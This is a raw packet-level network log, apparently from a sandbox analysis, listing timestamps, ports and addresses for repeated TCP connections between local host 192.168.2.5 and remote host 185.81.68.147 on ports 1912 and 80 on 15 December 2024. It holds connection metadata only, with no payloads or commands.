                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.210572958 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.279987097 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.280922890 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326729059 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326797009 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326806068 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326862097 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326874018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326915026 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326924086 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326965094 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.326998949 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815876961 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815886021 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815934896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815939903 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815943956 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.815979004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816001892 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816004038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816014051 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816029072 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816061974 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816062927 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816104889 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816212893 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816226959 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816236973 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816247940 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816271067 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816274881 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816274881 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.816319942 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.933984041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934012890 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934092045 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934098959 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934139967 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934175968 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.934199095 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935661077 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935703039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935720921 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935760975 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935832024 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935872078 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935888052 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935925961 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.935986042 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936026096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936045885 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936079025 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936191082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936233044 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936249018 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936274052 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936290026 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936315060 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936327934 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936368942 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936379910 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936419964 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936434984 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936460972 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936484098 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936503887 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936506033 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936544895 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936557055 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:30.936597109 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054164886 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054208040 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054269075 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054317951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054311991 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.054430008 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055447102 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055521011 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055716038 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055763006 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055773020 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.055814981 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056335926 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056389093 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056397915 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056451082 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056479931 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056520939 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056535006 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056560993 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056574106 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056615114 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056651115 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056703091 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056749105 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056788921 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056802034 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056838989 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056952000 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.056992054 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057012081 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057049990 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057058096 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057097912 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057113886 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057137966 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057146072 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.057245016 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.174345970 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.536638975 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537051916 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537123919 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537133932 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537322044 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537427902 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.537504911 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.655870914 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656016111 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656061888 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656115055 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656128883 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656193018 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656224966 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656232119 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656266928 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656294107 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656296968 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656394005 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656521082 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656595945 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656691074 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656753063 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656910896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.656982899 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657133102 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657188892 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657402039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657461882 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657485008 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.657543898 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.699245930 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.699692011 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.759691954 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.759851933 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.760735035 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.760735035 CET4974680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776508093 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776540041 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776551962 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776591063 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776602030 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776740074 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776784897 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776887894 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776889086 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776961088 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776966095 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.776999950 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777060032 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777065039 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777117014 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777131081 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777179003 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777229071 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777298927 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777321100 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777369976 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777379036 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.777426004 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.863368988 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.863719940 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.864722967 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.880539894 CET8049746185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897135019 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897176027 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897219896 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897232056 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897249937 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897430897 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897475958 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897492886 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897597075 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897645950 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897675037 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897707939 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897716999 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897763968 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897799015 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897850037 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897862911 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897912979 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897970915 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.897999048 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898031950 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898035049 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898066044 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.898092985 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.984636068 CET8049752185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.984889030 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:31.985049963 CET4975280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017554045 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017730951 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017776966 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017790079 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017878056 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:32.017880917 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:46.211441994 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424607038 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424659967 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.424721956 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.425825119 CET4979480192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.536711931 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.545541048 CET8049794185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.656440973 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.658782959 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.658782959 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.778672934 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.779369116 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:47.899188042 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.104778051 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.105082989 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.105290890 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.106724977 CET4979680192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.215676069 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.226521969 CET8049796185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.335867882 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.336199999 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.339306116 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.459486961 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.459721088 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:49.579834938 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951261044 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951358080 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.951714993 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:50.953531027 CET4980280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.068206072 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.076522112 CET8049802185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189606905 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189896107 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.189982891 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.310379982 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.310628891 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:51.431402922 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646693945 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646737099 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.646795034 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.648231983 CET4980880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.755383015 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.767920971 CET8049808185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.875962973 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.876051903 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.876112938 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.995894909 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:52.995955944 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:53.115835905 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501616955 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501801968 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.501874924 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.503372908 CET4981380192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.614665031 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.623161077 CET8049813185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734424114 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734556913 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.734743118 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.854530096 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.854842901 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:54.975229025 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181477070 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181519032 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.181606054 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.182857990 CET4981980192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.286554098 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.302519083 CET8049819185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.407960892 CET8049822185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.408080101 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.408164024 CET4982280192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:56.528688908 CET8049822185.81.68.147192.168.2.5
